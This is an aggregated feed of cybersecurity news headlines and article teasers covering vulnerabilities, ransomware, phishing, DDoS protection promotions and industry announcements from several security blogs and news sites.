To meet growing demand and accelerate our growth, we are launching a new sales team. Weare looking for talented, ambitious, and motivated B2B sales representatives and businessintroducers who share our vision of a safer and more resilient internet. Job Profile:Position: B2B Sales Representatives and Business IntroducersAs a key member of our Sales Team, you will … Continue reading Recruitment Announcement: B2B Sales Representatives and Business Introducers

The post Recruitment Announcement: B2B Sales Representatives and Business Introducers appeared first on KoDDoS Blog.

⏳ Only 3 Days Left to Grab 10% Off on All KoDDoS Services! 🎃

The countdown has begun! There are only 3 days left to take advantage of our Halloween special and enjoy 10% off on all our hosting and DDoS protection services. Don’t miss this limited-time offer to secure your website with KoDDoS’s high-performance solutions at a great price! 🎃 Promo Code: HALLOWEEN2024 🎃 Use code HALLOWEEN2024 at … Continue reading ⏳ Only 3 Days Left to Grab 10% Off on All KoDDoS Services! 🎃

The post ⏳ Only 3 Days Left to Grab 10% Off on All KoDDoS Services! 🎃 appeared first on KoDDoS Blog.

Understanding and Preventing DDoS Attacks with KoDDoS

Distributed Denial of Service (DDoS) attacks represent one of the most formidable threats to modern businesses and organizations whose information systems are connected to the internet. These attacks aim to render a service unavailable by overwhelming the target server’s resources with a massive volume of malicious traffic from multiple sources. In the face of this … Continue reading Understanding and Preventing DDoS Attacks with KoDDoS

The post Understanding and Preventing DDoS Attacks with KoDDoS appeared first on KoDDoS Blog.

Special Halloween Offer: 10% Off All Hosting and DDoS Protection Services! 🎃

Halloween is just around the corner, and at KoDDoS, we’re celebrating this spooky season with an exclusive offer that will make you smile! To mark the occasion, we’re giving you 10% off all our hosting and DDoS protection services. Whether you’re launching a new project or looking to enhance the security of your existing site, … Continue reading Special Halloween Offer: 10% Off All Hosting and DDoS Protection Services! 🎃

The post Special Halloween Offer: 10% Off All Hosting and DDoS Protection Services! 🎃 appeared first on KoDDoS Blog.

Celebrate Halloween with an Exclusive 10% Discount from KoDDoS! 🎃

🎃 Exclusive Halloween Promo – 10% Off on All Services From October 18, 2024, to October 31, 2024, enjoy our limited-time Halloween offer with the promo code: 👉 HALLOWEEN2024 👈 Simply apply this code at checkout to receive your discount. Whether you’re a small business owner, a content creator, or managing a large e-commerce platform, … Continue reading Celebrate Halloween with an Exclusive 10% Discount from KoDDoS! 🎃

The post Celebrate Halloween with an Exclusive 10% Discount from KoDDoS! 🎃 appeared first on KoDDoS Blog.

Discover the Benefits of KoDDoS and Its New Infrastructures in Japan and Sweden

Secure Hosting to Support Your Business KoDDoS, your expert in secure hosting and DDoS protection, continues to innovate by providing its customers with the best hosting solutions worldwide. We are proud to announce the deployment of new ultra-efficient infrastructures in Japan and Sweden. With this strategic expansion, KoDDoS not only strengthens its global reach but … Continue reading Discover the Benefits of KoDDoS and Its New Infrastructures in Japan and Sweden

The post Discover the Benefits of KoDDoS and Its New Infrastructures in Japan and Sweden appeared first on KoDDoS Blog.

The Return of the Internet Archive After a Cyberattack: The Challenge of Cybersecurity

“The Internet Archive, renowned for its vast digital library and its web preservation tool, the Wayback Machine, recently fell victim to a major cyberattack that disrupted its services. On October 9, a combined attack involving a data breach and a distributed denial-of-service (DDoS) attack took the site offline. This incident also led to the theft … Continue reading The Return of the Internet Archive After a Cyberattack: The Challenge of Cybersecurity

The post The Return of the Internet Archive After a Cyberattack: The Challenge of Cybersecurity appeared first on KoDDoS Blog.

Interview with Luc M. aka “Moussier Network” Senior Consultant and Founder at “Just Do DDoS”: Protecting Businesses Against DDoS

What is a DDoS consultant? Luc M.: A DDoS consultant is an expert specializing in securing digital infrastructures against Distributed Denial of Service (DDoS) attacks. As a DDoS consultant, our mission is among other things to support our clients and partners in implementing effective protection measures to prevent these increasingly frequent and sophisticated threats. at … Continue reading Interview with Luc M. aka “Moussier Network” Senior Consultant and Founder at “Just Do DDoS”: Protecting Businesses Against DDoS

The post Interview with Luc M. aka “Moussier Network” Senior Consultant and Founder at “Just Do DDoS”: Protecting Businesses Against DDoS appeared first on KoDDoS Blog.

Best Practices for Securing Your SaaS Environment

Can you imagine a modern working world without Software-as-a-Service ( SaaS) applications? Productivity, communication, and project management solutions have transformed the modern workplace, enabling hybrid and remote working, helping to cut costs, and offering unprecedented opportunities for collaboration and innovation. Without them, the business world would grind to a halt. But these applications, like anything connected to the internet, are vulnerable to cyber threats. Part of the problem is that SaaS providers are responsible for securing SaaS infrastructure, platforms, and application...

Industry Optimism Grows as TSA Proposes Balanced Cybersecurity Measures

The Transportation Security Administration (TSA) has proposed new rules requiring those under its jurisdiction to follow specific cyber risk management (CRM) requirements, report cybersecurity incidents in a certain timeframe, and address physical security concerns. This is positive news for the transportation industry, as hundreds of attacks have been leveled against the sector. These attacks have the potential to impact the supply chain, create chaos, and endanger human lives. TSA's notice of proposed rulemaking (NPRM) "continues TSA's commitment to performance-based requirements and builds...

New Law Could Mean Prison for Reporting Data Leaks

The Turkish government is proposing a controversial new cybersecurity law that could make it a criminal act to report on data breaches. The new legislation proposes penalties for various cybersecurity-related offences. But they key one which has people concerned is this: "Those who carry out activities aimed at targeting institutions or individuals by creating the perception that there has been a data breach in cyberspace, even though there has been no data breach, shall be sentenced to imprisonment for a term of two to five years." The problem is, of course, that such a law may discourage the...

From Alerts to Action: How AI Empowers SOC Analysts to Make Better Decisions

Security Operations Center ( SOC) analysts have it rough. Modern security tools generate an extraordinary number of alerts, attackers are more sophisticated than ever, and IT infrastructures are unprecedentedly complex. As a result, analysts are overwhelmed with workload and alerts, making it near-impossible to make intelligent, informed decisions. Fortunately, artificial intelligence ( AI) is helping to ease the strain. Let’s look at how. Better Allocated Resources As noted, modern SOC analysts must deal with a barrage of security alerts. Not only do modern organizations suffer a vast number...

CIS Control 05: Account Management

Knowing who has credentials, how those credentials are granted, and how they are being used is the foundation of any secure environment. It begins with user accounts and the credentials they use. Maintaining a thorough inventory of all accounts and verifying any changes to those accounts as authorized and intentional vs unintended is paramount to establishing a secure environment, and this includes service accounts. Establishing and maintaining visibility on all accounts can protect assets in multiple ways. If an adversary is able to attack from a different vector that we do not have any...

Understanding Microsoft's CVSS v3.1 Ratings and Severity Scores

Recently, I looked at Microsoft’s assigned CVSS v3.1 scores for Patch Tuesday vulnerabilities alongside the Microsoft assigned severity ratings. I wanted to revisit these numbers and see just how closely CVSS aligns with Microsoft’s opinion of severity. Disclaimer: I’m aware that CVSS v4.0 exists. However, Microsoft has not yet adopted it, and I wanted an apples-to-apples comparison. What Is CVSS v3.1? CVSS v3.1 provides the Qualitative Severity Rating Scale, which looks like this: Rating CVSS Score None 0.0 Low 0.1 – 3.9 Medium 4.0 – 6.9 High 7.0 – 8.9 Critical 9.0 – 10.0 Source: FIRST.org...

Medusa Ransomware: What You Need To Know

What is the Medusa ransomware? Medusa is a ransomware-as-a-service (RaaS) platform that first came to prominence in 2023. The ransomware impacts organisations running Windows, predominantly exploiting vulnerable and unpatched systems and hijacking accounts through initial access brokers. Initial access brokers? Initial access brokers (IABs) specialise in gaining unauthorised access to the networks of organisations, and then sell that access to other cybercriminals - such as ransomware gangs like Medusa. So the ransomware attackers may not be the ones who initially hacked you? Correct. IABs may...

NASA's Cybersecurity Initiative: What Spacecraft Manufacturers Need to Know

NASA is about to introduce new requirements for its contractors. These requirements will dramatically improve the cybersecurity of spacecraft and the US’ resilience to cyber threats. But what do these requirements mean for spacecraft manufacturers? What challenges will they face? And what will they need to do to comply? Keep reading to find out. Understanding the Cyber Space Threat While NASA has cybersecurity requirements for its spacecraft in operation, these requirements do not extend to the spacecraft acquisition and development lifecycle. Essentially, NASA contractors are not currently...

Helping the Energy Sector Navigate NERC Complexities

The energy sector is the cornerstone of modern infrastructure, powering essential services and supporting the daily operations of economies worldwide. However, it also faces unique cybersecurity challenges, particularly in complying with the North American Electric Reliability Corporation's Critical Infrastructure Protection (NERC CIP) standards. Cyber threats keep growing in sophistication and frequency and the sector's critical assets—such as power grids, pipelines, and renewable energy networks—face unprecedented risk. The implications of a cyberattack on these systems extend far beyond...

Managing Security and Compliance in a Remote Work Environment

Remote work isn’t just a temporary trend anymore; it has become a permanent fixture. What began as a quick response during the pandemic has evolved into the new normal for businesses worldwide. In America, 20% of people now work from home. While this has its advantages (flexibility for workers and cost savings for businesses), it’s not without its complications, having cracked open a host of issues around cybersecurity and regulatory compliance. To address these challenges, businesses can’t afford to be lax. That means fixing security and compliance for remote work is not as simple as adding...

White House Considers Oracle-Led Takeover of TikTok with U.S. Investors

In a significant development, the Trump administration is reportedly formulating a plan to prevent a nationwide ban on TikTok, involving Oracle and a consortium of private investors. Under the proposed arrangement, ByteDance, TikTok’s Chinese parent company, would retain a minority stake, while Oracle would oversee critical operations, including algorithm management, data collection, and software updates. […]

The post White House Considers Oracle-Led Takeover of TikTok with U.S. Investors appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Critical Vulnerability in IBM Security Directory Enables Session Cookie Theft

IBM has announced the resolution of several security vulnerabilities affecting its IBM Security Directory Integrator and IBM Security Verify Directory Integrator products. The vulnerabilities, identified through the Common Vulnerabilities and Exposures (CVE) system, expose users to various risks, including sensitive data disclosure and potential cookie theft. The company urges customers to update to the latest […]

The post Critical Vulnerability in IBM Security Directory Enables Session Cookie Theft appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Critical Apache Solr Vulnerability Grants Write Access to Attackers on Windows

A new security vulnerability has been uncovered in Apache Solr, affecting versions 6.6 through 9.7.0. The issue, classified as a Relative Path Traversal vulnerability, exposes Solr instances running on Windows to potential risks of arbitrary file path manipulation and write-access. Tracked as SOLR-17543, this vulnerability could permit attackers to exploit the “configset upload” API through […]

The post Critical Apache Solr Vulnerability Grants Write Access to Attackers on Windows appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

GitHub Vulnerability Exposes User Credentials via Malicious Repositories

A cybersecurity researcher recently disclosed several critical vulnerabilities affecting Git-related projects, revealing how improper handling of credential protocols can lead to sensitive data leaks. From GitHub Desktop to Git Credential Manager and Git LFS, these issues were uncovered during a routine bug-hunting session for the GitHub Bug Bounty program, resulting in the assignment of multiple […]

The post GitHub Vulnerability Exposes User Credentials via Malicious Repositories appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Critical Isolation Vulnerability in Intel Trust Domain Extensions Exposes Sensitive Data

Researchers from IIT Kharagpur and Intel Corporation have identified a significant security vulnerability in Intel Trust Domain Extensions (TDX), a foundational technology designed to ensure robust isolation between virtual machines (VMs) in secure environments. The study reveals that hardware performance counters (HPCs), meant for performance monitoring, can be exploited by Virtual Machine Managers (VMMs) to […]

The post Critical Isolation Vulnerability in Intel Trust Domain Extensions Exposes Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Burp Suite 2025.1 Released, What’s New!

Burp Suite 2025.1, is packed with new features and enhancements designed to improve your web application testing workflow. This latest version brings exciting upgrades like auto-pausing Burp Intruder attacks based on response content, exporting Collaborator interactions to CSV, highlighting Content-Length mismatches, a browser upgrade, and several bug fixes. Let’s dive into what’s new. Game-Changing Features […]

The post Burp Suite 2025.1 Released, What’s New! appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Chrome Security Update – Patch for 3 High-Severity Vulnerabilities

Google has released a critical update for the Chrome browser, addressing three high-severity security vulnerabilities. This patch, part of the latest Stable channel release, ensures users remain protected from potential threats. The new version rolled out progressively, underscores Chrome’s commitment to providing a secure browsing environment. Users are urged to update their browsers promptly to […]

The post Chrome Security Update – Patch for 3 High-Severity Vulnerabilities appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

New Phishing Framework Attack Multiple Brands Login Pages To Steal Credentials

Researchers have identified a sophisticated phishing tactic leveraging Cloudflare’s workers.dev, a free domain name service, to execute credential theft campaigns. The modus operandi involves a generic phishing page that can impersonate any brand, with significant technical ingenuity aimed at deceiving unsuspecting users and evading detection. The phishing page, hosted on the URL “workers-playground-broken-king-d18b.supermissions.workers.dev,” is designed […]

The post New Phishing Framework Attack Multiple Brands Login Pages To Steal Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Weaponised XWorm RAT Builder Attacking Script Kiddies To Hack 18,000 Devices

A recent cybersecurity attack involving a Trojanized version of the XWorm Remote Access Trojan (RAT) builder has compromised over 18,000 devices worldwide. This sophisticated malware, primarily distributed via GitHub repositories, Telegram channels, and other platforms, has targeted cybersecurity novices, also known as “script kiddies,” who unknowingly downloaded malicious tools. Trojanized XWorm RAT Builder Exploits Over […]

The post Weaponised XWorm RAT Builder Attacking Script Kiddies To Hack 18,000 Devices appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

LockBit Ransomware: 11-Day Timeline from Initial Compromise to Deployment

A well-coordinated cyber intrusion, spanning 11 days, culminated in the deployment of LockBit ransomware across a corporate environment. The attack, which began with the execution of a malicious file posing as a Windows Media Configuration Utility, displayed a sophisticated playbook leveraging Cobalt Strike, advanced persistence mechanisms, lateral movement, data exfiltration tools, and an eventual ransomware […]

The post LockBit Ransomware: 11-Day Timeline from Initial Compromise to Deployment appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Open-source security spat leads companies to join forces for new tool

A company’s licensing change to a static analysis tool has forced 10 companies together to create Opengrep.

The post Open-source security spat leads companies to join forces for new tool appeared first on CyberScoop.

SonicWall pushes urgent patch for its SMA appliance

The flaw has a severity rating of 9.8 out of 10, and a patch has been made available.

The post SonicWall pushes urgent patch for its SMA appliance appeared first on CyberScoop.

DOJ indicts five in North Korean fake IT worker scheme

The department alleges that a North Carolina-based laptop farm enabled access for two North Korean nationals over the course of the scheme.

The post DOJ indicts five in North Korean fake IT worker scheme appeared first on CyberScoop.

New backdoor discovered that specifically targets Juniper routers

Researchers at Black Lotus Labs have uncovered an operation where a back door is dropped onto enterprise-grade Juniper Networks routers and listens for specific network signals, known as “magic packets,” to execute malicious commands.  The campaign, which researchers at the cybersecurity wing of Lumen Technologies refer to as “J-Magic,” was active between mid-2023 and mid-2024. […]

The post New backdoor discovered that specifically targets Juniper routers appeared first on CyberScoop.

Removal of Cyber Safety Review Board members sparks alarm from cyber pros, key lawmaker

Not everyone opposed the move, however, even as the board reviews the major Salt Typhoon telecom breach.

The post Removal of Cyber Safety Review Board members sparks alarm from cyber pros, key lawmaker appeared first on CyberScoop.

BreachForums founder to be resentenced after court vacates previous punishment

Conor Fitzpatrick was initially sentenced to 20 years of supervised release following a guilty plea in July 2023.

The post BreachForums founder to be resentenced after court vacates previous punishment appeared first on CyberScoop.

‘Severe’ bug in ChatGPT’s API could be used to DDoS websites

The vulnerability, described by a researcher as “bad programming,” allows an attacker to send unlimited connection requests through ChatGPT’s API.

The post ‘Severe’ bug in ChatGPT’s API could be used to DDoS websites appeared first on CyberScoop.

Cloudflare detected (and blocked) the biggest DDoS attack on record

The company said that the 5.6 Tbps attack is indicative of the steady increase in the size of these attacks.

The post Cloudflare detected (and blocked) the biggest DDoS attack on record appeared first on CyberScoop.

Government battles against tech could leave consumers less secure

Courts and federal regulators too often treat consumers as bystanders, a Center for Cybersecurity Policy and Law expert argues.

The post Government battles against tech could leave consumers less secure appeared first on CyberScoop.

Ransomware groups pose as fake tech support over Teams

A researcher at Sophos told CyberScoop that the company observed these tactics being used against multiple individuals and at least 15 organizations.

The post Ransomware groups pose as fake tech support over Teams appeared first on CyberScoop.

Multiple Git flaws led to credentials compromise

Vulnerabilities in the Git credential retrieval protocol could have allowed threat actors to access user credentials. Security researcher RyotaK from GMO Flatt Security Inc discovered multiple vulnerabilities in the Git credential retrieval protocol that could have allowed threat actors to access user credentials. The vulnerabilities stem from the improper handling of messages in Git’s credential […]

GamaCopy targets Russia mimicking Russia-linked Gamaredon APT

New threat actor GamaCopy mimics Russia-linked Gamaredon APT in attacks on Russian-speaking targets. The Knownsec 404 Advanced Threat Intelligence team recently analyzed attacks on Russian-speaking targets using military-themed bait, 7z SFX for payloads, and UltraVNC, mimicking Gamaredon’s TTPs. The researchers linked the activity to the APT Core Werewolf (aka Awaken Likho, PseudoGamaredon), it mimics Gamaredon […]

ESXi ransomware attacks use SSH tunnels to avoid detection

Threat actors behind ESXi ransomware attacks target virtualized environments using SSH tunneling to avoid detection. Researchers at cybersecurity firm Sygnia warn that threat actors behind ESXi ransomware attacks target virtualized environments using SSH tunneling to avoid detection. Ransomware groups are exploiting unmonitored ESXi appliances to persist and access corporate networks. They use “living-off-the-land” techniques, leveraging […]

Attackers allegedly stole $69 million from cryptocurrency platform Phemex

Crooks stole at least $69 million from Singapore-based cryptocurrency platform Phemex in an alleged cyberattack. Singapore-based crypto platform Phemex paused operations after a cyberattack that resulted in the theft of $69M. Phemex CEO Federico Variola stated they are restoring withdrawals and temporarily manually reviewing all requests. On Thursday, researchers at the blockchain security firm PeckShield noticed […]

Change Healthcare data breach exposed the private data of over half the U.S.

The Change Healthcare data breach is worse than initially estimated: approximately 190 million people have been affected. The Change Healthcare data breach is worse than initially estimated, the incident has impacted 190 million people. In October 2024, UnitedHealth Group announced that the data breach suffered by Change Healthcare in February 2024 impacted more than 100 million individuals. […]

SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 30

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Gmail For Exfiltration: Malicious npm Packages Target Solana Private Keys and Drain Victims’ Wallets       Threat Bulletin: Weaponized Software Targets Chinese-Speaking Organizations  Mass Campaign of Murdoc Botnet Mirai: A New Variant of Corona Mirai   Sophos MDR […]

Security Affairs newsletter Round 508 by Pierluigi Paganini – INTERNATIONAL EDITION

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Subaru Starlink flaw allowed experts to remotely hack cars Participants in the Pwn2Own Automotive 2025 earned $886,250 U.S. […]

Cisco warns of a ClamAV bug with PoC exploit

Cisco addressed a ClamAV denial-of-service (DoS) vulnerability, and experts warn of the availability of a proof-of-concept (PoC) exploit code. Cisco has released security updates to address a ClamAV denial-of-service (DoS) vulnerability tracked as CVE-2025-20128. The Cisco PSIRT experts warn of the availability of a proof-of-concept (PoC) exploit code for this flaw. The vulnerability resides in […]

Subaru Starlink flaw allowed experts to remotely hack cars

Subaru Starlink flaw exposed vehicles and customer accounts in the US, Canada, and Japan to remote attacks. Popular security researcher Sam Curry and he colleague Shubham Shah discovered a vulnerability in Subaru’s Starlink connected vehicle service that exposed vehicles and customer accounts in the US, Canada, and Japan susceptible to remote attacks. The experts explained […]

Participants in the Pwn2Own Automotive 2025 earned $886,250

The Pwn2Own Automotive 2025 hacking contest has ended, and participants earned $886,250 after demonstrating 49 zero-day flaws. The Pwn2Own Automotive 2025 hacking contest has ended, and participants earned $886,250 after demonstrating 49 zero-day flaws. Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) obtained 30.5 Master of Pwn points and won the Master of Pwn earning $222.250. […]

Future-Proof Your WordPress Site: Essential Plugins for 2025

The digital landscape is constantly growing and evolving. As such, some tips and tricks that worked for websites in 2023 might be obsolete in 2025. For any digital professional, remaining dedicated to top-quality practice that stands the test of time is just the start. This means staying ahead of the curve and leveraging the best […]

The post Future-Proof Your WordPress Site: Essential Plugins for 2025 appeared first on IT Security Guru.

Privacy Teams Understaffed, Under Resourced and Under Stress, Research Finds

New research by ISACA has revealed that more than two in five (45%) privacy professionals in Europe believe that their organisation’s privacy budget is underfunded, an increase from 41% in 2024. Worryingly, over half (54%) of privacy professionals expect budgets to decrease further in 2025. This may leave privacy teams under resourced, understaffed and, in […]

The post Privacy Teams Understaffed, Under Resourced and Under Stress, Research Finds appeared first on IT Security Guru.

2024 Most Inspiring Women in Cyber Winners: Where Are They Now?

Over the past five years, The Most Inspiring Women in Cyber Awards have celebrated some of the most exceptional women from across the cybersecurity industry. From new starters and students to CEOs and CISOs, the awards aim to celebrate outstanding individuals at every level of the industry. No deed is too small for recognition and […]

The post 2024 Most Inspiring Women in Cyber Winners: Where Are They Now? appeared first on IT Security Guru.

SandboxAQ Partners with Google Cloud to Advance Quantitative AI in Enterprise Applications

SandboxAQ is teaming up with Google Cloud to revolutionise how Large Quantitative Models (LQMs) are developed, integrated, and deployed in enterprise environments. The partnership will see SandboxAQ utilize Google Cloud’s advanced infrastructure as its preferred cloud platform and leverage the Google Cloud Marketplace to streamline access to its cutting-edge solutions. SandboxAQ’s LQMs are at the […]

The post SandboxAQ Partners with Google Cloud to Advance Quantitative AI in Enterprise Applications appeared first on IT Security Guru.

Forward-Thinking Industry Leaders Sponsor Most Inspiring Women in Cyber Awards 2025

Eskenzi PR are proud to announce that KnowBe4, Mimecast, Varonis, Bridewell, Certes, and Pentest Tools have joined BT as sponsors for this year’s Most Inspiring Women in Cyber Awards. The 5th annual event, held at the iconic BT Tower on the 26th February 2025, aims to celebrate trailblazers from across the cybersecurity industry who are […]

The post Forward-Thinking Industry Leaders Sponsor Most Inspiring Women in Cyber Awards 2025 appeared first on IT Security Guru.

Open Banking Shortcomings Threaten UK Global Leadership Position Research Finds

APIContext has released its UK Open Banking API Performance 2023-2024 Report, the annual analysis of the performance of the open banking APIs exposed by the large CMA9 UK banks (the nine largest banks required by UK law to provide open banking services), traditional High Street banks, credit card providers, building societies, and new digital banks (neobanks). […]

The post Open Banking Shortcomings Threaten UK Global Leadership Position Research Finds appeared first on IT Security Guru.

Companies Double Down on AI and Supply Chain Security, According to Black Duck’s BSIMM15 Report

Organisations worldwide are ramping up efforts to tackle emerging security risks in artificial intelligence (AI) and software supply chains, according to the newly released BSIMM15 report from Black Duck. The report, which examines software security practices across 121 companies, reveals a sharp increase in activities aimed at strengthening defenses against evolving threats. Key findings from […]

The post Companies Double Down on AI and Supply Chain Security, According to Black Duck’s BSIMM15 Report appeared first on IT Security Guru.

KnowBe4 Research Confirms Effective Security Awareness Training Significantly Reduces Data Breaches

KnowBe4, cybersecurity platform that comprehensively addresses human risk management, today released a new white paper that provides data-driven evidence on the effectiveness of security awareness training (SAT) in reducing data breaches. Over 17,500 data breaches from the Privacy Rights Clearinghouse database were analysed along with KnowBe4’s extensive customer data to quantify the impact of SAT […]

The post KnowBe4 Research Confirms Effective Security Awareness Training Significantly Reduces Data Breaches appeared first on IT Security Guru.

NXLog undergoes strategic leadership change

NXLog, a leading technology provider of log management solutions, announced the appointment of Harald Reisinger as its new Chief Executive Officer. Co-founder and former CEO Botond Botyánszki will transition to the Chief Technology Officer (CTO) role. Together, they will focus on driving innovation to extend the company’s product portfolio towards the rapidly growing observability and […]

The post NXLog undergoes strategic leadership change appeared first on IT Security Guru.

Memcyco Delivers Offensive Capabilities for Companies to Tackle Digital Impersonation Fraud

Digital impersonation attacks have always put companies on the defensive, but a new offering from the cybersecurity startup Memcyco promises to change that narrative.  With the latest version of its platform, Memcyco offers sophisticated tools to block digital impersonation attacks and track them in real time, take down malicious websites, identify the perpetrators, and improve […]

The post Memcyco Delivers Offensive Capabilities for Companies to Tackle Digital Impersonation Fraud appeared first on IT Security Guru.

Three Big Reasons Ransomware Payments Are Up More Than 5X Over Last Year

If the mission of cybersecurity is to protect the organization from losses to cybercriminals, we are in deep trouble. Over the past year there has been a dramatic increase in...

The post Three Big Reasons Ransomware Payments Are Up More Than 5X Over Last Year appeared first on Cyber Defense Magazine.

The Rise in Phishing Scams

As cybersecurity platforms have become more effective, cyber attackers have shifted their strategy. Rather than challenging defense applications to identify weaknesses, they are now increasingly focused on exploiting human behavior....

The post The Rise in Phishing Scams appeared first on Cyber Defense Magazine.

The Relationship Between Network and Security: Why They’re Ditching the “It’s Your Fault” Game

Remember the good old days of IT? Back when firewalls were like bouncers at a nightclub, and security was a sleepy corner in the IT department? Those days are about...

The post The Relationship Between Network and Security: Why They’re Ditching the “It’s Your Fault” Game appeared first on Cyber Defense Magazine.

Revolutionizing Investigations: The Impact of AI in Digital Forensics

Artificial intelligence (AI) is making waves in many industries across the board. It found use in healthcare, manufacturing, retail, finance, and other sectors that deal with large volumes of data....

The post Revolutionizing Investigations: The Impact of AI in Digital Forensics appeared first on Cyber Defense Magazine.

The Frontier of Security: Safeguarding Non-Human Identities

Dropbox, Microsoft, Okta – not only are these all major software companies, but each of them has fallen victim to a supply chain attack due to a compromised non-human identity....

The post The Frontier of Security: Safeguarding Non-Human Identities appeared first on Cyber Defense Magazine.

The Cybersecurity Checklist: Top Methods and Tools for Protection And Mitigation

The rapid development of artificial intelligence (AI) is fueling an increase in cyber-attacks, threatening the data infrastructure of businesses and individuals. Approximately 85 percent of cybersecurity professionals attribute the increase...

The post The Cybersecurity Checklist: Top Methods and Tools for Protection And Mitigation appeared first on Cyber Defense Magazine.

The Age of Unseen Truths And Deceptive Lies

From the moment we’re born, we are surrounded by a mix of true and false information. In the past, distinguishing between them was relatively easy, but over time, it has...

The post The Age of Unseen Truths And Deceptive Lies appeared first on Cyber Defense Magazine.

Tagged Files as a Road to Insider Threats

The insider threat is any individual within community who does something against such surrounding even being used for sabotage, diversion, espionage and the other purposes, so far. On the other...

The post Tagged Files as a Road to Insider Threats appeared first on Cyber Defense Magazine.

The Power of Many: Crowdsourcing as A Game-Changer for Modern Cyber Defense

With the rapid technological advancement and the world entering the AI era, the cyber threat landscape has significantly evolved in its complexity and sophistication. The frequency of data breaches has...

The post The Power of Many: Crowdsourcing as A Game-Changer for Modern Cyber Defense appeared first on Cyber Defense Magazine.

Operational Security: The Backbone of Effective Police Communication

In the fast-paced and dynamic world of law enforcement, effective communication is essential for ensuring public safety and successful operations. However, amidst the ever-evolving landscape of technology and threats, maintaining...

The post Operational Security: The Backbone of Effective Police Communication appeared first on Cyber Defense Magazine.

CVE-2025-23006: Critical Vulnerability Discovered in SonicWall SMA 1000 Series

Key Takeaways

• Critical vulnerability discovered in SonicWall’s SMA 1000 series appliances, tracked as CVE-2025-23006.
• Impacted products include Appliance Management Console (AMC) and Central Management Console (CMC) products, versions 12.4.3-02804 and earlier.
• This vulnerability could allow a remote, unauthenticated attacker to execute arbitrary commands.
• We recommend upgrading to version 12.4.3-02854 (platform-hotfix) or later immediately.

From Noise to Clarity: The Value of MalOp™ Technology in Modern Cyber Defense

"Out-of-the-Box" Detection Coverage: A Critical Metric for Endpoint Security

Back in the summer I wrote a blog around capability versus usability, in which I highlighted that typically industry testing focuses on capability, despite one of the key challenges in the industry being skills. EDR by its nature, is a technical capability and as such the skills gap in this space is even greater. I will always remember a good friend sharing in his keynote, a number of years ago, that there is little point in buying a best of breed solution if you don’t have the people powers to actually use it.

In our recent SoC optimizationresearch we saw that on average only 50-80% of alerts are processed the same day, false positives being a significant challenge and distraction for SoC analysts.

CVE-2024-55956: Zero-Day Vulnerability in Cleo Software Could Lead to Data Theft

Key Takeaways

• Zero-day vulnerability was discovered in 3 Cleo products, tracked as CVE-2024-55956
• Cleo is the developer of various managed file transfer platforms with approximately 4,000 customers, mostly mid-sized organizations
• CVE-2024-55956 could allow unauthenticated users to import and execute arbitrary Bash or PowerShell commands on host systems by leveraging default settings of the Autorun directory
• Threat actor group, CL0P, has claimed responsibility for vulnerability exploitation with the goal of data theft
• We recommend upgrading to version 5.8.0.24 immediately

Your Data Is Under New Lummanagement: The Rise of LummaStealer

Cybereason Security Services issues Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.

In this Threat Analysis report, Cybereason Security Services investigate the rising activity of the malware LummaStealer.

Leader in SOC Efficiency and Operational Excellence in MITRE ATT&CK 2024 Results

As cyber threats grow in complexity, security teams find themselves struggling to distinguish true risk from the noise of relentless alerts. Today’s adversaries operate at a global scale and around the clock, targeting endpoints across Windows, Linux, and macOS environments with advanced ransomware and espionage techniques. In the recent 2024 MITRE ATT&CK® Enterprise Evaluation, Cybereason once again demonstrated why out-of-the-box detection coverage and operational efficiency matter more than ever.

Blog: 2025 predictions

2025 Predictions - Greg Day VP & Field CISO, Cybereason

Stellar Discovery of A New Cluster of Andromeda/Gamarue C2

 Cybereason Security Services issue Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.

Cybereason Merges with Trustwave, Enhances MDR and Consulting Services

As the cyber threat landscape grows in complexity, organizations are increasingly turning to their cybersecurity partners for support. From tackling compliance mandates to actively ejecting threat actors from internal systems and helping raise organizational resilience, end-to-end cyber solutions are crucial.

Insourcing versus Outsourcing

One of the quotes often attributed to Albert Einstein is “Insanity is doing the same thing over and over again and expecting different results”. Whilst there’s debate if this was something Einstein actually said, the sentiment definitely rings true.

How to spot a holiday shopping scam: Fake deals, trick surveys & bogus gift cards

Scammers, fraudsters, and phishers take advantage of every season. But the holiday shopping season - which includes Black Friday, Cyber Monday, and Christmas - may be their favorite.

As retailers rush to capitalize on what is generally their most profitable time of year, they will generally flood email boxes with great offers that are often time sensitive and may even seem too-good-to-be-true. Meanwhile, consumers also feel the urgency to get their shopping done, along with the stresses of work and family. Add in the financial pressure of an inflationary economy and the likelihood of making a quick mistake keeps increasing. Read on for some simple yet effective ways to ruin the scammers' fun as you celebrate the season of giving.

Soon�

Posted by Sean @ 12:52 GMT

Our "construction project" is progressing nicely.



And it should resolve this…



Fix mobile usability issues?

Translation: your site doesn't help us sell more Android phones and ads.

But whatever, the "issues" should be fixed soon enough.

On 18/08/15 At 12:52 PM

Work In Progress

Posted by Sean @ 13:25 GMT

Regular readers will have noticed it's been slow here of late.


Under Construction

We're finally undertaking an upgrade from Greymatter 1.7.3. This may be the world's oldest Greymatter blog… that will now change.

More info coming soon.

In the meantime, you can still catch us on Twitter.

On 13/08/15 At 01:25 PM

"IOS Crash Report" Update: Safari Adds Block Feature

Posted by Sean @ 09:53 GMT

Ask, and sometimes, you shall receive.

Last Friday, we wrote about call center scammers targeting iOS. And today, Apple released a new (beta) feature that should help.

Apple released iOS 9 Public Beta 2:



And it appears that one of Safari's new features allows people to block fraud-focused JavaScript.



